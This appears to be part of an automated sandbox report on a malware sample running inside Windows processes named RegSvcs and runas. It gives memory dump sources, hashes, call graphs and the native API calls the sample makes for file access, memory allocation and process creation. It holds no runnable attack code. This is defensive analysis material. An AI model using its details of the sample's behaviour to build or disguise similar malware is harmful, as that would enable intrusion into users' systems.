                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugPrintTimes
                                                                                                              • String ID: Bl$l
                                                                                                              • API String ID: 3446177414-208461968
                                                                                                              • Opcode ID: 6b772705dd1e69711ae53ed9bea23ba79798c7be8aeeb86bd7798a3fbf965c2e
                                                                                                              • Instruction ID: 871b07cc632fd977f95271282b82681e966931addfd31361e0fd0c173d85a206
                                                                                                              • Opcode Fuzzy Hash: 6b772705dd1e69711ae53ed9bea23ba79798c7be8aeeb86bd7798a3fbf965c2e
                                                                                                              • Instruction Fuzzy Hash: F0A1C170A083689BEB249B18CD81FAAB7B5BB45304F0450FDD509B7241CB76AE86CB52
                                                                                                              APIs
                                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 00EF5E34
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorHandling__start
                                                                                                              • String ID: pow
                                                                                                              • API String ID: 3213639722-2276729525
                                                                                                              • Opcode ID: 730f8e02fedd48d005a6ad1b3f7cd9e7efa22c9975e145533bb7e7d54fe160af
                                                                                                              • Instruction ID: 8f42bc81f751d5ae904da148c9d8ab67f724e4ad2a1d9341b8b45071ffeba19a
                                                                                                              • Opcode Fuzzy Hash: 730f8e02fedd48d005a6ad1b3f7cd9e7efa22c9975e145533bb7e7d54fe160af
                                                                                                              • Instruction Fuzzy Hash: F5518B73A09A0DD6C7117714C9123BA3BD4EB50704F30AD98F3E6A62A9EF348E949646
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0$Flst
                                                                                                              • API String ID: 0-758220159
• Opcode ID: 215ca67e11116a5d89323a077fe3e83e66351be7ecf357db73589b578fab7ff2
• Instruction ID: b62521856e3ed35cf03c3918024bb39c289e4e40784798a0d3410e3453e1fda7
• Opcode Fuzzy Hash: 215ca67e11116a5d89323a077fe3e83e66351be7ecf357db73589b578fab7ff2
• Instruction Fuzzy Hash: 71519CF1E00699CFDF25CF96D8846A9FBF5EF54318F24802AD049AB290E7749D81CB80
APIs
• RtlDebugPrintTimes.NTDLL ref: 00EDD959
  • Part of subcall function 00EB4859: RtlDebugPrintTimes.NTDLL ref: 00EB48F7
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
• Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: $$$
• API String ID: 3446177414-233714265
• Opcode ID: 3d568d840480981b2679f1ea161ac870048b9b80bca60e739c46119c74386dfa
• Instruction ID: 1f821b860fd3c2f4143e8016b20ca0876df32ebbdc7e59045f3ceb7661aee381
• Opcode Fuzzy Hash: 3d568d840480981b2679f1ea161ac870048b9b80bca60e739c46119c74386dfa
• Instruction Fuzzy Hash: 2851FDB1E083499FCB19DFA4C88179DBBB1FB45318F24506AE4017B392C775A886EB80
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
• Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: 0$0
• API String ID: 3446177414-203156872
• Opcode ID: c161ce4fdb5a6ef72707f18af11cd72f5145577679920886f0445660ac174f77
• Instruction ID: 22f4bb2a9317c33e2a4ba52075fe2eec4c6c82f40b26953cdc89c317d1eaad8c
• Opcode Fuzzy Hash: c161ce4fdb5a6ef72707f18af11cd72f5145577679920886f0445660ac174f77
• Instruction Fuzzy Hash: E04149B16087069FC310CF28C984A5BBBE4BB8D318F04492EF589EB341D771EA05CB96

Execution Graph

Execution Coverage: 2.5%
Dynamic/Decrypted Code Coverage: 4.1%
Signature Coverage: 1.5%
Total number of Nodes: 468
Total number of Limit Nodes: 76
                                                                                                              execution_graph 99440 50b010 99445 50ad20 99440->99445 99442 50b01d 99459 50a990 99442->99459 99444 50b039 99446 50ad45 99445->99446 99470 508620 99446->99470 99449 50ae90 99449->99442 99451 50aea7 99451->99442 99452 50ae9e 99452->99451 99454 50af95 99452->99454 99489 50a3e0 99452->99489 99456 50affa 99454->99456 99498 50a750 99454->99498 99502 51b840 99456->99502 99460 50a9a6 99459->99460 99467 50a9b1 99459->99467 99461 51b920 RtlAllocateHeap 99460->99461 99461->99467 99462 50a9d8 99462->99444 99463 508620 GetFileAttributesW 99463->99467 99464 50acf5 99465 50ad0e 99464->99465 99466 51b840 RtlFreeHeap 99464->99466 99465->99444 99466->99465 99467->99462 99467->99463 99467->99464 99468 50a3e0 RtlFreeHeap 99467->99468 99469 50a750 RtlFreeHeap 99467->99469 99468->99467 99469->99467 99471 508641 99470->99471 99472 508648 GetFileAttributesW 99471->99472 99473 508653 99471->99473 99472->99473 99473->99449 99474 513630 99473->99474 99475 51363e 99474->99475 99476 513645 99474->99476 99475->99452 99505 504840 99476->99505 99478 51367a 99479 513689 99478->99479 99515 513100 LdrLoadDll LdrLoadDll 99478->99515 99485 513834 99479->99485 99512 51b920 99479->99512 99482 5136a2 99483 51382a 99482->99483 99482->99485 99486 5136be 99482->99486 99484 51b840 RtlFreeHeap 99483->99484 99483->99485 99484->99485 99485->99452 99486->99485 99487 51b840 RtlFreeHeap 99486->99487 99488 51381e 99487->99488 99488->99452 99490 50a406 99489->99490 99520 50de20 99490->99520 99492 50a478 99494 50a5fa 99492->99494 99495 50a496 99492->99495 99493 50a5df 99493->99452 99494->99493 99496 50a2a0 RtlFreeHeap 99494->99496 99495->99493 99525 50a2a0 99495->99525 99496->99494 99499 50a776 99498->99499 99500 50de20 RtlFreeHeap 99499->99500 99501 50a7fd 99500->99501 99501->99454 99533 519b10 99502->99533 99504 50b001 99504->99442 99507 504864 99505->99507 99506 50486b 99506->99478 99507->99506 99509 
50488a 99507->99509 99516 51ccc0 LdrLoadDll 99507->99516 99510 5048b7 99509->99510 99511 5048ad LdrLoadDll 99509->99511 99510->99478 99511->99510 99517 519ac0 99512->99517 99514 51b938 99514->99482 99515->99479 99516->99509 99518 519ada 99517->99518 99519 519aeb RtlAllocateHeap 99518->99519 99519->99514 99522 50de23 99520->99522 99521 50de51 99521->99492 99522->99521 99523 51b840 RtlFreeHeap 99522->99523 99524 50de94 99523->99524 99524->99492 99526 50a2bd 99525->99526 99529 50deb0 99526->99529 99528 50a3c3 99528->99495 99530 50ded4 99529->99530 99531 50df7e 99530->99531 99532 51b840 RtlFreeHeap 99530->99532 99531->99528 99532->99531 99534 519b2d 99533->99534 99535 519b3e RtlFreeHeap 99534->99535 99535->99504 99536 505e90 99541 5083b0 99536->99541 99538 505ec0 99540 505eec 99538->99540 99545 508330 99538->99545 99542 5083c3 99541->99542 99552 518cd0 99542->99552 99544 5083ee 99544->99538 99546 508374 99545->99546 99547 508395 99546->99547 99558 518aa0 99546->99558 99547->99538 99549 508385 99550 5083a1 99549->99550 99563 5197a0 99549->99563 99550->99538 99553 518d4e 99552->99553 99555 518cfe 99552->99555 99557 4522dd0 LdrInitializeThunk 99553->99557 99554 518d73 99554->99544 99555->99544 99557->99554 99559 518ace 99558->99559 99560 518b1d 99558->99560 99559->99549 99566 4524650 LdrInitializeThunk 99560->99566 99561 518b42 99561->99549 99564 5197ba 99563->99564 99565 5197cb NtClose 99564->99565 99565->99547 99566->99561 99567 5075d0 99568 5075e8 99567->99568 99570 507642 99567->99570 99568->99570 99571 50b540 99568->99571 99572 50b566 99571->99572 99573 50b78d 99572->99573 99598 519ba0 99572->99598 99573->99570 99575 50b5dc 99575->99573 99601 51ca10 99575->99601 99577 50b5fb 99577->99573 99578 50b6cc 99577->99578 99607 518dd0 99577->99607 99580 505e10 LdrInitializeThunk 99578->99580 99582 50b6e8 99578->99582 99580->99582 99586 50b775 99582->99586 99614 518940 99582->99614 99583 50b6b4 99587 5083b0 LdrInitializeThunk 99583->99587 99584 50b666 99584->99573 99584->99583 
99585 50b695 99584->99585 99611 505e10 99584->99611 99629 514a50 LdrInitializeThunk 99585->99629 99588 5083b0 LdrInitializeThunk 99586->99588 99592 50b6c2 99587->99592 99593 50b783 99588->99593 99592->99570 99593->99570 99594 50b74c 99619 5189f0 99594->99619 99596 50b766 99624 518b50 99596->99624 99599 519bba 99598->99599 99600 519bcb CreateProcessInternalW 99599->99600 99600->99575 99602 51c980 99601->99602 99603 51c9dd 99602->99603 99604 51b920 RtlAllocateHeap 99602->99604 99603->99577 99605 51c9ba 99604->99605 99606 51b840 RtlFreeHeap 99605->99606 99606->99603 99608 518dea 99607->99608 99630 4522c0a 99608->99630 99609 50b65d 99609->99578 99609->99584 99613 505e4e 99611->99613 99633 518fa0 99611->99633 99613->99585 99615 51896e 99614->99615 99616 5189bd 99614->99616 99615->99594 99639 45239b0 LdrInitializeThunk 99616->99639 99617 5189e2 99617->99594 99620 518a6d 99619->99620 99621 518a1e 99619->99621 99640 4524340 LdrInitializeThunk 99620->99640 99621->99596 99622 518a92 99622->99596 99625 518bca 99624->99625 99627 518b7b 99624->99627 99641 4522fb0 LdrInitializeThunk 99625->99641 99626 518bef 99626->99586 99627->99586 99629->99583 99631 4522c11 99630->99631 99632 4522c1f LdrInitializeThunk 99630->99632 99631->99609 99632->99609 99634 51904d 99633->99634 99635 518fce 99633->99635 99638 4522d10 LdrInitializeThunk 99634->99638 99635->99613 99636 519092 99636->99613 99638->99636 99639->99617 99640->99622 99641->99626 99642 4522ad0 LdrInitializeThunk 99643 509ed3 99644 509edf 99643->99644 99645 509ee6 99644->99645 99646 51b840 RtlFreeHeap 99644->99646 99646->99645 99647 5070d6 99648 507080 99647->99648 99651 5070e0 99647->99651 99652 5081e0 99648->99652 99650 5070ae 99653 5081fd 99652->99653 99659 518ec0 99653->99659 99655 50824d 99656 508254 99655->99656 99657 518fa0 LdrInitializeThunk 99655->99657 99656->99650 99658 50827d 99657->99658 99658->99650 99660 518f58 99659->99660 99662 518eeb 99659->99662 99664 4522f30 LdrInitializeThunk 99660->99664 99661 518f91 
99661->99655 99662->99655 99664->99661 99665 502a57 99668 506590 99665->99668 99667 502a73 99669 5065c3 99668->99669 99670 5065e4 99669->99670 99675 519300 99669->99675 99670->99667 99672 506607 99672->99670 99673 5197a0 NtClose 99672->99673 99674 506687 99673->99674 99674->99667 99676 51931d 99675->99676 99679 4522ca0 LdrInitializeThunk 99676->99679 99677 519349 99677->99672 99679->99677 99680 5010db PostThreadMessageW 99681 5010ed 99680->99681 99682 4f9d80 99683 4f9d8f 99682->99683 99684 4f9dd0 99683->99684 99685 4f9dbd CreateThread 99683->99685 99686 518c00 99687 518c8c 99686->99687 99689 518c2b 99686->99689 99691 4522ee0 LdrInitializeThunk 99687->99691 99688 518cbd 99691->99688 99692 51c940 99693 51b840 RtlFreeHeap 99692->99693 99694 51c955 99693->99694 99695 516340 99696 51639a 99695->99696 99698 5163a7 99696->99698 99699 513d50 99696->99699 99706 51b7c0 99699->99706 99701 513d91 99702 504840 2 API calls 99701->99702 99704 513e9e 99701->99704 99705 513dd7 99702->99705 99703 513e20 Sleep 99703->99705 99704->99698 99705->99703 99705->99704 99709 519900 99706->99709 99708 51b7ee 99708->99701 99710 519992 99709->99710 99712 51992b 99709->99712 99711 5199a8 NtAllocateVirtualMemory 99710->99711 99711->99708 99712->99708 99713 519700 99714 519777 99713->99714 99716 51972e 99713->99716 99715 51978d NtDeleteFile 99714->99715 99717 518d80 99718 518d9a 99717->99718 99721 4522df0 LdrInitializeThunk 99718->99721 99719 518dc2 99721->99719 99722 5073f0 99723 50740c 99722->99723 99727 507459 99722->99727 99725 5197a0 NtClose 99723->99725 99723->99727 99724 507591 99726 507424 99725->99726 99732 506820 NtClose LdrInitializeThunk LdrInitializeThunk 99726->99732 99727->99724 99733 506820 NtClose LdrInitializeThunk LdrInitializeThunk 99727->99733 99729 50756b 99729->99724 99734 5069f0 NtClose LdrInitializeThunk LdrInitializeThunk 99729->99734 99732->99727 99733->99729 99734->99724 99735 517030 99736 517095 99735->99736 99737 5170c0 99736->99737 99740 510d70 99736->99740 99739 
5170a2 99741 510d8a 99740->99741 99743 510b20 99740->99743 99742 510d5c 99742->99739 99743->99742 99744 5066a0 LdrInitializeThunk 99743->99744 99745 519260 LdrInitializeThunk 99743->99745 99746 5197a0 NtClose 99743->99746 99744->99743 99745->99743 99746->99743 99747 515ab0 99748 515b12 99747->99748 99750 515b1f 99748->99750 99751 507650 99748->99751 99752 507633 99751->99752 99753 50768d 99751->99753 99754 50b540 9 API calls 99752->99754 99753->99750 99755 507642 99754->99755 99755->99750 99756 511df0 99757 511e09 99756->99757 99758 511e51 99757->99758 99761 511e91 99757->99761 99763 511e96 99757->99763 99759 51b840 RtlFreeHeap 99758->99759 99760 511e61 99759->99760 99762 51b840 RtlFreeHeap 99761->99762 99762->99763 99770 5033f3 99775 508030 99770->99775 99772 50341f 99774 5197a0 NtClose 99774->99772 99776 503403 99775->99776 99777 50804a 99775->99777 99776->99772 99776->99774 99781 518e70 99777->99781 99780 5197a0 NtClose 99780->99776 99782 518e8a 99781->99782 99785 45235c0 LdrInitializeThunk 99782->99785 99783 50811a 99783->99780 99785->99783 99786 4f9de0 99788 4fa13c 99786->99788 99789 4fa522 99788->99789 99790 51b4c0 99788->99790 99791 51b4e6 99790->99791 99796 4f4070 99791->99796 99793 51b4f2 99795 51b52b 99793->99795 99799 5158d0 99793->99799 99795->99789 99798 4f407d 99796->99798 99803 503500 99796->99803 99798->99793 99800 515932 99799->99800 99802 51593f 99800->99802 99814 501cc0 99800->99814 99802->99795 99804 50351a 99803->99804 99806 503530 99804->99806 99807 51a210 99804->99807 99806->99798 99809 51a22a 99807->99809 99808 51a259 99808->99806 99809->99808 99810 518dd0 LdrInitializeThunk 99809->99810 99811 51a2b6 99810->99811 99812 51b840 RtlFreeHeap 99811->99812 99813 51a2cc 99812->99813 99813->99806 99815 501cfb 99814->99815 99830 508140 99815->99830 99817 501d03 99818 501fc3 99817->99818 99819 51b920 RtlAllocateHeap 99817->99819 99818->99802 99820 501d19 99819->99820 99821 51b920 RtlAllocateHeap 99820->99821 99822 501d2a 99821->99822 99823 51b920 
RtlAllocateHeap 99822->99823 99824 501d37 99823->99824 99829 501dbf 99824->99829 99845 506cf0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99824->99845 99826 504840 2 API calls 99827 501f72 99826->99827 99841 518210 99827->99841 99829->99826 99831 50816c 99830->99831 99832 508030 2 API calls 99831->99832 99833 50818f 99832->99833 99834 5081b1 99833->99834 99835 508199 99833->99835 99836 5081cd 99834->99836 99839 5197a0 NtClose 99834->99839 99837 5081a4 99835->99837 99838 5197a0 NtClose 99835->99838 99836->99817 99837->99817 99838->99837 99840 5081c3 99839->99840 99840->99817 99842 518272 99841->99842 99844 51827f 99842->99844 99846 501fe0 99842->99846 99844->99818 99845->99829 99848 502000 99846->99848 99862 508410 99846->99862 99855 502553 99848->99855 99866 511430 99848->99866 99850 50205e 99850->99855 99870 51c8e0 99850->99870 99852 502217 99853 51ca10 2 API calls 99852->99853 99856 50222c 99853->99856 99854 5083b0 LdrInitializeThunk 99858 502273 99854->99858 99855->99844 99856->99858 99875 500b00 99856->99875 99858->99854 99858->99855 99860 500b00 LdrInitializeThunk 99858->99860 99859 5083b0 LdrInitializeThunk 99861 5023c1 99859->99861 99860->99858 99861->99858 99861->99859 99863 50841d 99862->99863 99864 508445 99863->99864 99865 50843e SetErrorMode 99863->99865 99864->99848 99865->99864 99867 511449 99866->99867 99868 51b7c0 NtAllocateVirtualMemory 99867->99868 99869 511451 99868->99869 99869->99850 99871 51c8f0 99870->99871 99872 51c8f6 99870->99872 99871->99852 99873 51b920 RtlAllocateHeap 99872->99873 99874 51c91c 99873->99874 99874->99852 99876 500b0e 99875->99876 99879 519a20 99876->99879 99880 519a3a 99879->99880 99883 4522c70 LdrInitializeThunk 99880->99883 99881 500b1f 99881->99861 99883->99881 99884 4fb7e0 99885 51b7c0 NtAllocateVirtualMemory 99884->99885 99886 4fce51 99884->99886 99885->99886 99887 50c8a0 99889 50c8c9 99887->99889 99888 50c9cd 99889->99888 99890 50c973 FindFirstFileW 99889->99890 99890->99888 99892 50c98e 
99890->99892 99891 50c9b4 FindNextFileW 99891->99892 99893 50c9c6 FindClose 99891->99893 99892->99891 99893->99888 99894 50fb20 99895 50fb84 99894->99895 99896 506590 2 API calls 99895->99896 99898 50fcb7 99896->99898 99897 50fcbe 99898->99897 99923 5066a0 99898->99923 99900 50fd3a 99901 50fe72 99900->99901 99920 50fe63 99900->99920 99927 50f900 99900->99927 99902 5197a0 NtClose 99901->99902 99904 50fe7c 99902->99904 99905 50fd76 99905->99901 99906 50fd81 99905->99906 99907 51b920 RtlAllocateHeap 99906->99907 99908 50fdaa 99907->99908 99909 50fdb3 99908->99909 99910 50fdc9 99908->99910 99911 5197a0 NtClose 99909->99911 99936 50f7f0 CoInitialize 99910->99936 99913 50fdbd 99911->99913 99914 50fdd7 99939 519260 99914->99939 99916 50fe52 99917 5197a0 NtClose 99916->99917 99918 50fe5c 99917->99918 99919 51b840 RtlFreeHeap 99918->99919 99919->99920 99921 50fdf5 99921->99916 99922 519260 LdrInitializeThunk 99921->99922 99922->99921 99924 5066c5 99923->99924 99943 5190e0 99924->99943 99928 50f91c 99927->99928 99929 504840 2 API calls 99928->99929 99931 50f93a 99929->99931 99930 50f943 99930->99905 99931->99930 99932 504840 2 API calls 99931->99932 99933 50fa0e 99932->99933 99934 504840 2 API calls 99933->99934 99935 50fa68 99933->99935 99934->99935 99935->99905 99938 50f855 99936->99938 99937 50f8eb CoUninitialize 99937->99914 99938->99937 99940 51927a 99939->99940 99948 4522ba0 LdrInitializeThunk 99940->99948 99941 5192aa 99941->99921 99944 5190fd 99943->99944 99947 4522c60 LdrInitializeThunk 99944->99947 99945 506739 99945->99900 99947->99945 99948->99941 99949 5025e0 99950 502582 99949->99950 99951 5025eb 99949->99951 99952 5025a6 99950->99952 99953 518dd0 LdrInitializeThunk 99950->99953 99956 519830 99952->99956 99953->99952 99955 5025bb 99957 5198bf 99956->99957 99959 51985e 99956->99959 99961 4522e80 LdrInitializeThunk 99957->99961 99958 5198f0 99958->99955 99959->99955 99961->99958 99962 511a60 99963 511a7c 99962->99963 99964 511aa4 99963->99964 99965 511ab8 
99963->99965 99966 5197a0 NtClose 99964->99966 99967 5197a0 NtClose 99965->99967 99968 511aad 99966->99968 99969 511ac1 99967->99969 99972 51b960 RtlAllocateHeap 99969->99972 99971 511acc 99972->99971 99973 510420 99974 51043d 99973->99974 99975 504840 2 API calls 99974->99975 99976 51045b 99975->99976 99982 5194a0 99983 519557 99982->99983 99985 5194d2 99982->99985 99984 51956d NtCreateFile 99983->99984 99993 508aa3 99994 508aa8 99993->99994 99995 508a94 99993->99995 99994->99995 99997 507370 99994->99997 99998 507386 99997->99998 100000 5073bf 99997->100000 99998->100000 100001 5071e0 LdrLoadDll LdrLoadDll 99998->100001 100000->99995 100001->100000 100002 5115ee 100003 511600 100002->100003 100015 519610 100003->100015 100005 51160f 100006 511642 100005->100006 100007 51162d 100005->100007 100009 5197a0 NtClose 100006->100009 100008 5197a0 NtClose 100007->100008 100010 511636 100008->100010 100012 51164b 100009->100012 100011 511682 100012->100011 100013 51b840 RtlFreeHeap 100012->100013 100014 511676 100013->100014 100016 5196b4 100015->100016 100018 51963b 100015->100018 100017 5196ca NtReadFile 100016->100017 100017->100005 100018->100005

Control-flow Graph

• Executed
• Not Executed
                                                                                                              control_flow_graph 26 4f9de0-4fa13a 27 4fa14b-4fa157 26->27 28 4fa159-4fa166 27->28 29 4fa168-4fa179 27->29 28->27 31 4fa18a-4fa196 29->31 32 4fa198-4fa1a5 31->32 33 4fa1a7-4fa1b1 31->33 32->31 34 4fa1c2-4fa1ce 33->34 36 4fa1de-4fa1f6 34->36 37 4fa1d0-4fa1dc 34->37 38 4fa207-4fa210 36->38 37->34 40 4fa226-4fa22f 38->40 41 4fa212-4fa224 38->41 42 4fa235-4fa23f 40->42 43 4fa452-4fa45c 40->43 41->38 46 4fa250-4fa259 42->46 45 4fa46d-4fa476 43->45 47 4fa478-4fa488 45->47 48 4fa495-4fa49f 45->48 49 4fa25b-4fa267 46->49 50 4fa277-4fa28a 46->50 53 4fa48a-4fa490 47->53 54 4fa493 47->54 55 4fa4b0-4fa4bc 48->55 51 4fa269-4fa26f 49->51 52 4fa275 49->52 56 4fa29b-4fa2a5 50->56 51->52 52->46 53->54 54->45 59 4fa4be-4fa4cb 55->59 60 4fa4d8-4fa4df 55->60 61 4fa2a7-4fa2d1 56->61 62 4fa2d3-4fa2dd 56->62 64 4fa4cd-4fa4d3 59->64 65 4fa4d6 59->65 67 4fa567-4fa570 60->67 68 4fa4e5-4fa4ec 60->68 61->56 66 4fa2ee-4fa2fa 62->66 64->65 65->55 72 4fa2fc-4fa308 66->72 73 4fa30a-4fa314 66->73 69 4fa58c-4fa596 67->69 70 4fa572-4fa58a 67->70 74 4fa4ee-4fa51b 68->74 75 4fa51d call 51b4c0 68->75 70->67 72->66 78 4fa325-4fa32e 73->78 74->68 79 4fa522-4fa52c 75->79 80 4fa34c-4fa35b 78->80 81 4fa330-4fa33c 78->81 84 4fa53d-4fa549 79->84 85 4fa35d 80->85 86 4fa362-4fa376 80->86 82 4fa33e-4fa344 81->82 83 4fa34a 81->83 82->83 83->78 84->67 88 4fa54b-4fa557 84->88 85->43 89 4fa387-4fa393 86->89 90 4fa559-4fa55f 88->90 91 4fa565 88->91 92 4fa3a6-4fa3b0 89->92 93 4fa395-4fa3a4 89->93 90->91 91->84 96 4fa3c1-4fa3cb 92->96 93->89 97 4fa41f-4fa426 96->97 98 4fa3cd-4fa41d 96->98 100 4fa44d 97->100 101 4fa428-4fa44b 97->101 98->96 100->40 101->97
Strings
Memory Dump Source
• Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
Yara matches
Similarity
• API ID:
• String ID: "$$I$1$3[$3[$=$?v$D$E$H$P$V]$W$$W$$]$^$e:$e|$k$lY$m$r$w6$|N$8
• API String ID: 0-1752912700
• Opcode ID: 3eac154be1e29a7eb7162fa120cc200f8b47f6ee9f84fee90962fe48ca1160cd
• Instruction ID: 7ea713a6bfb38d31800287baa11287206189825081d0c0c7b3a10ac6d9eeada9
• Opcode Fuzzy Hash: 3eac154be1e29a7eb7162fa120cc200f8b47f6ee9f84fee90962fe48ca1160cd
• Instruction Fuzzy Hash: 0A226FB0D0522CCBEB24CF45C994BEDBBB2BB45308F1081DAC50D6B281C7B95A99DF56
APIs
• FindFirstFileW.KERNELBASE(?,00000000), ref: 0050C984
• FindNextFileW.KERNELBASE(?,00000010), ref: 0050C9BF
• FindClose.KERNELBASE(?), ref: 0050C9CA
Memory Dump Source
• Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: 9e98eb2d0b99c6d6241c35b8b61864dc414000d5f196c19a70df0a0435f512d5
• Instruction ID: 99d86e119d866c7960f07253e2a6746fc4f9660debb683a1adf1e35f9f95c6d7
• Opcode Fuzzy Hash: 9e98eb2d0b99c6d6241c35b8b61864dc414000d5f196c19a70df0a0435f512d5
• Instruction Fuzzy Hash: 50317372600309BBEB20DB60CC86FFF7B7CAB85744F144559FA49A6181D770AA85CBA0
APIs
• NtCreateFile.NTDLL(?,?,FECAB67C,?,?,?,?,?,?,?,?), ref: 0051959E
Memory Dump Source
• Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 8b2f8a90cbcb9c51e23d35672095220602af1adf597b7b9044390d8898631838
• Instruction ID: 301d0257cea865e9f9dd4a092ad41158e068a028c4a647458d23ac37922272e2
• Opcode Fuzzy Hash: 8b2f8a90cbcb9c51e23d35672095220602af1adf597b7b9044390d8898631838
• Instruction Fuzzy Hash: DE31F4B1A01248AFDB14DF98D881EEEBBB9EF8C704F108109F908A7341D770A941CBA4
APIs
• NtReadFile.NTDLL(?,?,FECAB67C,?,?,?,?,?,?), ref: 005196F3
Memory Dump Source
• Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
Joe Sandbox IDA Plugin
